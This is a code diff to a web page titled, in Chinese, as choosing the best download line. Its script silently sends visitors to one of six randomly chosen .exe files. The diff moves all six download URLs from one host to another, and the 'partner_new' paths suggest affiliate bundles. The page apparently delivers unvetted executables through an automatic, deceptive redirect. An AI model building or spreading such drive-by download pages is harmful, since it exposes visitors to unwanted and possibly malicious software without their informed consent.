--- a/index.html
+++ b/index.html
@@ -4,12 +4,12 @@
 <title>已为你选择最佳下载线路...</title>
 <script>
 function a(){
-var arr=["http://software.wowo98.com.cn/partner_new/wowo_23_71751.exe",
- "http://software.wowo98.com.cn/partner_new/wowo_23_71618.exe",
- "http://software.wowo98.com.cn/partner_new/wowo_23_71722.exe", 
- "http://software.wowo98.com.cn/partner_new/wowo_23_71751.exe",
- "http://software.wowo98.com.cn/partner_new/wowo_23_71618.exe", 
- "http://software.wowo98.com.cn/partner_new/wowo_23_71722.exe", 
+var arr=["http://software.liaoliao98.net/partner_new/liaoliao_23_71751.exe",
+ "http://software.liaoliao98.net/partner_new/liaoliao_23_71618.exe",
+ "http://software.liaoliao98.net/partner_new/liaoliao_23_71722.exe", 
+ "http://software.liaoliao98.net/partner_new/liaoliao_23_71751.exe",
+ "http://software.liaoliao98.net/partner_new/liaoliao_23_71618.exe", 
+ "http://software.liaoliao98.net/partner_new/liaoliao_23_71722.exe", 
 ];
 var n=parseInt(Math.random()*6);
 window.location.href=arr[n];
